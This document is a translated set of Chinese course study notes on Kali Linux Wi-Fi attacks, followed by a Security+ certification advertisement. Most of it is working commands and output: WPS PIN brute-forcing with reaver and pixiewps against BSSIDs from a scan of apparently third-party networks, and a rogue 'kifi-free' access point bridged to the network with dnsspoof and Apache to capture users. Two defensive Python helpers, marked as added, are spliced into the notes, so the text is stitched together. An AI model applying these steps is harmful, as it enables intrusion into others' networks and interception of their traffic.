安全牛 Study Notes: WPS and Other Tools


root@kali:~# service network-manager stop

root@kali:~# airmon-ng check kill
Killing these processes:

  PID Name
  765 dhclient
  988 wpa_supplicant

Run the two commands above first, then pass the wireless adapter through to the virtual machine; keep this order.

root@kali:~# ifconfig            // the adapter is not listed

root@kali:~# ifconfig -a       // you must run ifconfig -a to see the adapter

root@kali:~# airmon-ng start wlan2
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
 1672 avahi-daemon
 1673 avahi-daemon

PHY     Interface       Driver         Chipset

phy0    wlan2           ath9k_htc      Atheros Communications, Inc. AR9271 802.11
                  (mac80211 monitor mode vif enabled for [phy0]wlan2 on [phy0]wlan2mon)
                  (mac80211 station mode vif disabled for [phy0]wlan2)

root@kali:~# iwconfig
eth0      no wireless extensions.

wlan2mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
                   Retry short limit:7  RTS thr:off  Fragment thr:off
                   Power Management:off

lo        no wireless extensions.

root@kali:~# wash

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

Required Arguments:
                -i, --interface=<iface>              Interface to capture packets on
                -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
                -c, --channel=<num>                  Channel to listen on [auto]
                -o, --out-file=<file>                Write data to file
                -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
                -D, --daemonize                      Daemonize wash
                -C, --ignore-fcs                     Ignore frame checksum errors
                -5, --5ghz                           Use 5GHz 802.11 channels
                -s, --scan                           Use scan mode
                -u, --survey                         Use survey mode [default]
                -P, --output-piped                   Allows Wash output to be piped. Example. wash x|y|z...
                -g, --get-chipset                    Pipes output and runs reaver alongside to get chipset
                -h, --help                           Show help

Example:
               wash -i mon0

root@kali:~# wash -i wlan2mon

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID                    Channel       RSSI       WPS Version        WPS Locked       ESSID
------------------------------------------------------------------------------------------------
D0:C7:C0:99:ED:3A        1             00         1.0                No               ziroom222
0C:82:68:5E:76:20        1             00         1.0                No               letv
14:75:90:21:4F:56        6             00         1.0                No               TP-LINK_4F56
5C:63:BF:F9:74:0C        6             00         1.0                No               TP-DO3234
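An added audit helper, not part of these notes or of wash itself: it parses wash output in the column layout above and, for the access points on an owned-BSSID list, reports those still advertising WPS with the registrar unlocked (the state the reaver and pixiewps runs below rely on), so WPS can be switched off on them; BSSIDs not on the list are returned separately for inventory reconciliation. The sample table and the owned list are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample in wash's column layout (compare the scan above); the
# BSSIDs and ESSIDs are invented for this example, not from any real scan.
WASH_OUTPUT = """\
BSSID                    Channel       RSSI       WPS Version        WPS Locked       ESSID
------------------------------------------------------------------------------------------------
02:11:22:33:44:01        1             -41        1.0                No               office-2f
02:11:22:33:44:02        6             -60        2.0                Yes              office-guest
02:11:22:33:44:03        11            -75        1.0                No               lab ap 3
"""

@dataclass
class WpsAp:
    bssid: str
    channel: int
    rssi: int
    version: str
    locked: bool
    essid: str

# One data row: MAC, channel, RSSI (wash prints 00 when unknown), version, Yes/No, ESSID
ROW_RE = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<ch>\d+)\s+(?P<rssi>-?\d+)\s+"
    r"(?P<ver>\d\.\d)\s+(?P<locked>Yes|No)\s+(?P<essid>.*?)\s*$"
)

def parse_wash(text):
    """Return a WpsAp per data row; the header, rule and blank lines are skipped."""
    aps = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            aps.append(WpsAp(m["bssid"].upper(), int(m["ch"]), int(m["rssi"]),
                             m["ver"], m["locked"] == "Yes", m["essid"]))
    return aps

def wps_audit(aps, owned_bssids):
    """Split a scan into APs we own that still answer WPS with the registrar
    unlocked (WPS should be disabled on them) and BSSIDs not on the owned list
    (candidates for the rogue-AP inventory check)."""
    owned = {b.upper() for b in owned_bssids}
    remediate, unknown = [], []
    for ap in aps:
        if ap.bssid not in owned:
            unknown.append(ap.bssid)
        elif not ap.locked:
            remediate.append((ap.bssid, ap.essid, ap.version))
    return remediate, unknown
```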

root@kali:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv -K 1

root@kali:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv     // starts the 11000-PIN brute-force attempt

root@kali:~# pixiewps

 Pixiewps 1.1 WPS pixie dust attack tool
 Copyright (c) 2015, wiire <[email protected]>

 Usage: pixiewps <arguments>

 Required Arguments:

    -e, --pke           : Enrollee public key
    -r, --pkr           : Registrar public key
    -s, --e-hash1       : Enrollee Hash1
    -z, --e-hash2       : Enrollee Hash2
    -a, --authkey       : Authentication session key

 Optional Arguments:

    -n, --e-nonce       : Enrollee nonce (mode 2,3,4)
    -m, --r-nonce       : Registrar nonce
    -b, --e-bssid       : Enrollee BSSID
    -S, --dh-small      : Small Diffie-Hellman keys (PKr not needed)   [No]
    -f, --force         : Bruteforce the whole keyspace (mode 4)       [No]
    -v, --verbosity     : Verbosity level 1-3, 1 is quietest            [2]

    -h, --help          : Display this usage screen

 Examples:

 pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
 pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
 pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S

 [!] Not all required arguments have been supplied!

root@kali:~# pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>

root@kali:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from 00:90:4C:C1:AC:21
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.

root@kali:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -p 52737488 -c 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.

EVIL TWIN AP / ROGUE AP
       Other tools
WPS (WiFi Protected Setup)
Wi-Fi freeloading, and having your Wi-Fi freeloaded
20% of the public-place wireless networks in Beijing, Shanghai and Guangzhou are fake

  WPS (WiFi Protected Setup)

  airbase-ng -a <AP mac> --essid "kifi" -c 11 wlan2mon

  apt-get install bridge-utils                            install the bridge utilities

  brctl addbr bridge                                      create the bridge (the slide mixed the names "bridge" and "Wifi-Bridge"; the same name must be used in every command)

  brctl addif bridge eth0

  brctl addif bridge at0

  ifconfig eth0 0.0.0.0 up

  ifconfig at0 0.0.0.0 up

  ifconfig bridge 192.168.1.10 up

  route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1

root@kali:~# airodump-ng wlan2mon
 CH  1 ][ Elapsed: 3 mins ][ 2015-11-18 21:11

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

14:75:90:21:4F:56  -47      114        5    0   6  54e. WPA2 CCMP   PSK  TP-LINK_4F56
EC:26:CA:DC:29:B6  -32      190        0    0  11  54e. WPA2 TKIP   MGT  kifi
08:10:79:2A:29:7A  -65      137        0    0   6  54e. WPA2 CCMP   PSK  2-1-403
D0:C7:C0:99:ED:3A  -69       94        8    0   1  54e  WPA2 CCMP   PSK  ziroom222
E0:06:E6:39:C3:0C  -76       90        0    0   6  54e. WPA2 CCMP   PSK  lizhi2012
5C:63:BF:F9:74:0C  -79       99        0    0   6  54e. WPA2 CCMP   PSK  TP-D03234
BC:D1:77:C0:87:DE  -86       56        0    0  11  54e  WPA2 CCMP   PSK  MERCURY_C087DE
50:BD:5F:C0:F6:D6  -85       46        0    0  11  54e. WPA2 CCMP   PSK  MasterHuang
BC:14:EF:A1:97:29  -84       46        0    0   1  54e  WPA2 CCMP   PSK  gehua01141406060486797
00:1E:58:0A:26:B2  -88       39        0    0   6  54e. WPA2 CCMP   PSK  dlink
EC:26:CA:3D:9C:ED  -90       12        0    0   1  54e. WPA2 CCMP   PSK  YW170
80:89:17:15:86:28  -90        9        0    0  11  54e. WPA2 CCMP   PSK  TP-D03235
C8:3A:35:2A:D6:A8  -91        7        0    0   6  54e  WPA2 CCMP   PSK  nayunhao

BSSID              STATION            PWR   Rate     Lost    Frames  Probe

14:75:90:21:4F:56  E8:3E:B6:1B:19:32  -64   0 -l1e      0         1
14:75:90:21:4F:56  90:3C:92:BA:00:CC  -77   0G-11       0         7
14:75:90:21:4F:56  18:DC:56:F0:26:9F  -84   0 -1        0         1


root@kali:~# airbase-ng -c 11 --essid kifi-free wlan2mon    // spoof the "kifi-free" wireless network
21:12:36  Created tap interface at0
12:12:36  Trying to set MTU on at0 to 1500
12:12:36  Trying to set MTU on wlan2mon to 1800
21:12:37  Access Point with BSSID 08:57:00:0C:96 started

root@kali:~# ifconfig -a    // the fake at0 interface has appeared

root@kali:~# airodump-ng wlan2mon      // sniff again: the fake network now shows up
 CH  1 ][ Elapsed: 3 mins ][ 2015-11-18 21:11

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:1E:58:0A:26:B2  -88       39        0    0   6  54e. WPA2 CCMP   PSK  dlink
C8:3A:35:2A:D6:A8  -91        7        0    0   6  54e  WPA2 CCMP   PSK  nayunhao
EC:26:CA:DC:29:B6  -32      190        0    0  11  54e  OPN
EC:26:CA:DC:29:B6  -32      190        0    0  11  54e. WPA2 TKIP   MGT  kifi
14:75:90:21:4F:56  -47      114        5    0   6  54e. WPA2 CCMP   PSK  TP-LINK_4F56
08:10:79:2A:29:7A  -65      137        0    0   6  54e. WPA2 CCMP   PSK  2-1-403
D0:C7:C0:99:ED:3A  -69       94        8    0   1  54e  WPA2 CCMP   PSK  ziroom222
5C:63:BF:F9:74:0C  -79       99        0    0   6  54e. WPA2 CCMP   PSK  TP-D03234
E0:06:E6:39:C3:0C  -76       90        0    0   6  54e. WPA2 CCMP   PSK  lizhi2012
BC:14:EF:A1:97:29  -84       46        0    0   1  54e  WPA2 CCMP   PSK  gehua01141406060486797
BC:D1:77:C0:87:DE  -86       56        0    0  11  54e  WPA2 CCMP   PSK  MERCURY_C087DE
50:BD:5F:C0:F6:D6  -85       46        0    0  11  54e. WPA2 CCMP   PSK  MasterHuang
EC:26:CA:3D:9C:ED  -90       12        0    0   1  54e. WPA2 CCMP   PSK  YW170

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

(not associated)   64:09:80:24:A2:C9  -93   0 - 1      0         3  leon
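As an added defensive example, not part of these notes or of the aircrack-ng suite, the following parses airodump-ng output in the layout above and reports the evil-twin indicators such a scan exposes: one BSSID beaconing two different security settings (as EC:26:CA:DC:29:B6 does above, once OPN and once WPA2), one ESSID served by differently secured BSSIDs, and an open network whose name merely extends a secured one (kifi-free next to kifi). The sample rows, addresses and names are constructed.

```python
import re
from collections import defaultdict

# Constructed rows in airodump-ng's column layout (as in the captures above);
# every address and network name here is made up for the example.
AIRODUMP_OUTPUT = """\
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
02:AA:00:00:00:01  -47      114        5    0   6  54e. WPA2 CCMP   PSK  corp-wifi
02:AA:00:00:00:02  -32      190        0    0  11  54e. WPA2 TKIP   MGT  kifi
02:AA:00:00:00:02  -32      190        0    0  11  54e  OPN
02:AA:00:00:00:03  -40       80        0    0   6  54e  OPN              corp-wifi
02:AA:00:00:00:05  -35       60        0    0  11  54e  OPN              kifi-free
02:AA:00:00:00:04  -70       30        0    0   1  54e. WPA2 CCMP   PSK  lab-ap
"""
MAC_RE = re.compile(r"^(?:[0-9A-F]{2}:){5}[0-9A-F]{2}$")

def parse_airodump(text):
    """Return the AP rows; the header and the station table are skipped."""
    aps = []
    for line in text.splitlines():
        p = line.split()
        # AP rows: BSSID PWR Beacons #Data #/s CH MB ENC [CIPHER AUTH] ESSID
        if len(p) < 8 or not MAC_RE.match(p[0]) or not p[7].startswith(("OPN", "WEP", "WPA")):
            continue
        rest = p[8:]
        if p[7] != "OPN" and len(rest) >= 2:   # drop the CIPHER and AUTH columns
            rest = rest[2:]
        aps.append({"bssid": p[0], "ch": int(p[5]), "enc": p[7], "essid": " ".join(rest)})
    return aps

def evil_twin_findings(aps):
    """Rogue-AP indicators in one pass: a BSSID beaconing two security settings,
    an ESSID served by differently secured BSSIDs, and an open network whose
    name extends a secured network's name (the kifi / kifi-free case above)."""
    encs, members = defaultdict(set), defaultdict(set)
    for ap in aps:
        encs[ap["bssid"]].add(ap["enc"])
        if ap["essid"]:
            members[ap["essid"]].add((ap["bssid"], ap["enc"]))
    out = [("bssid-enc-conflict", b, sorted(e)) for b, e in encs.items() if len(e) > 1]
    for essid, m in members.items():
        if len({enc for _, enc in m}) > 1:
            out.append(("essid-mixed-security", essid, sorted(b for b, _ in m)))
    secured = {ap["essid"] for ap in aps if ap["enc"] != "OPN" and ap["essid"]}
    for ap in aps:
        if ap["enc"] == "OPN":
            for name in secured:
                if ap["essid"] != name and ap["essid"].startswith(name):
                    out.append(("open-lookalike", ap["bssid"], ap["essid"] + " vs " + name))
    return out
```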

root@kali:~# apt-get install bridge-utils     // install the bridge utilities

root@kali:~# brctl
Usage: brctl [commands]
commands:
 addbr           <bridge>                  add bridge
 delbr           <bridge>                  delete bridge
 addif           <bridge> <device>         add interface to bridge
 delif           <bridge> <device>         delete interface from bridge
 hairpin         <bridge> <port> {on|off}  turn hairpin on/off
 setageing       <bridge> <time>           set ageing time
 setbridgeprio   <bridge> <prio>           set bridge priority
 setfd           <bridge> <time>           set bridge forward delay
 sethello        <bridge> <time>           set hello time
 setmaxage       <bridge> <time>           set max message age
 setpathcost     <bridge> <port> <cost>    set path cost
 setportprio     <bridge> <port> <prio>    set port priority
 show            [ <bridge> ]              show a list of bridges
 showmacs        <bridge>                  show a list of mac addrs
 showstp         <bridge>                  show bridge stp info
 stp             <bridge> {on|off}         turn stp on/off

root@kali:~# brctl addbr bridge

root@kali:~# brctl addif bridge eth0

root@kali:~# dhclient eth0
Job for smbd.service failed. See 'systemctl status smbd.service' and 'journalctl -xn' for details.
invoke-rc.d: initscript smbd, action "reload" failed.

root@kali:~# brctl addif bridge eth0

root@kali:~# brctl addif bridge at0

root@kali:~# ifconfig eth0 0.0.0.0 up

root@kali:~# ifconfig at0 0.0.0.0 up

root@kali:~# netstat -ar
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         10.1.1.1        0.0.0.0         UG        0 0          0 bridge

root@kali:~# route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.1.1.1

root@kali:~# netstat -ar
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         10.1.1.1        0.0.0.0         UG        0 0          0 bridge
10.0.0.0        10.1.1.1        255.0.0.0       U         0 0          0 bridge


WPS (WiFi Protected Setup)

echo 1 > /proc/sys/net/ipv4/ip_forward

dnsspoof -i bridge -f dnsspoof.hosts

/usr/share/dsniff/dnsspoof.hosts

apache2ctl start

root@kali:~# vi /proc/sys/net/ipv4/ip_forward
It will not let you modify the value!

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Changing the 0 to 1 turns on routing (IP forwarding)!

root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1

root@kali:~# dnsspoof -i bridge -f dnsspoof.hosts

root@kali:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

root@kali:~# cat /usr/share/dsniff/dnsspoof.hosts

root@kali:~# vi host

root@kali:~# dnsspoof -i bridge -f host
dnsspoof: listening on bridge [udp dst port 53 and not src 10.1.1.101]

root@kali:~# apache
apache2        apache2ctl        apachectl        apache-users

root@kali:~# apache2ctl start
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message

root@kali:~# netstat -pantu | grep :80
tcp6       0      0 :::80                   :::*                    LISTEN      2941/apache2

These notes were taken by a student of the 安全牛 classroom; to watch this course or find other practical information security material, head over to the 安全牛 classroom.

Why is the Security+ certification the hottest certification of the Internet+ era?


      First, 牛妹 introduces Security+


        The Security+ certification is a vendor-neutral third-party certification issued by CompTIA, the Computing Technology Industry Association of the United States. Together with CISSP, ITIL and others it counts among the ten most popular international IT certifications; where CISSP leans toward information security management, Security+ leans toward information security technology and operations.

       Passing the certification demonstrates competence in network security, compliance and operational security, threats and vulnerabilities, application, data and host security, access control and identity management, and cryptography. Because the exam is not easy and the credential carries weight, it has been widely adopted by enterprises and security professionals worldwide.

Why is the Security+ certification so popular?

       Reason one: among all information security certifications, those that emphasise security technology were a gap, and Security+ fills exactly that gap in the information security technology space.

      The information security certifications currently recognised in the industry are mainly CISP and CISSP, but both lean toward information security management; their technical content is broad and shallow, and the exams only touch on it in passing. Moreover, CISSP requires at least 5 years of information security work experience, and CISP requires a college diploma plus at least 4 years of work experience; these requirements block the path to certification for capable and ambitious young people. In the real world, whether looking for a job, seeking a promotion or a raise, or naming staff in a bid, certifications are indispensable, which puts young people at a real disadvantage. Security+ can clear these obstacles from young people's career development: because it leans toward information security technology, it has no special work-experience requirement. Anyone with an IT background who wants to progress can study for and take the exam.

       Reason two: a powerful tool for IT operations staff, both for their work and for moving up.

       In banking, securities, insurance, information and communications and similar industries there are a great many IT operations staff, and the work covers a very wide range: it is a comprehensive technical role spanning networks, systems, security, application architecture and storage. It may lack the tragic heroism of the programmers' "live as a bachelor, die writing code", but it has its own lament of "hoeing at noon is nothing next to the misery of ops". Facing computers and machines every day, confusion about career development is inevitable over time. The Security+ international certification lets ambitious IT operations staff learn network security knowledge and master network security practice, steering their careers toward network security and helping to relieve the domestic shortage of information security talent. And even for those who do not change track, learning security and obtaining a security certification is essential to doing operations work well.

        Reason three: down to earth, international, convenient to take, moderately priced!

CompTIA, as the most influential leading global organisation in the ICT field, is professional, fair and impartial in certifying information security talent. The Security+ certification emphasises hands-on operation and is closely tied to the daily work of front-line engineers, making it suitable for IT staff in banks, securities firms, insurers, Internet companies and the like. As an international certification it is widely recognised in 147 countries.

        In the current wave of information security, talent is the key to its development. Domestic information security talent is in very short supply, and we believe the Security+ certification will surely become the hottest information security certification.

This article comes from the "11662938" blog; please retain this source: http://11672938.blog.51cto.com/11662938/1967657
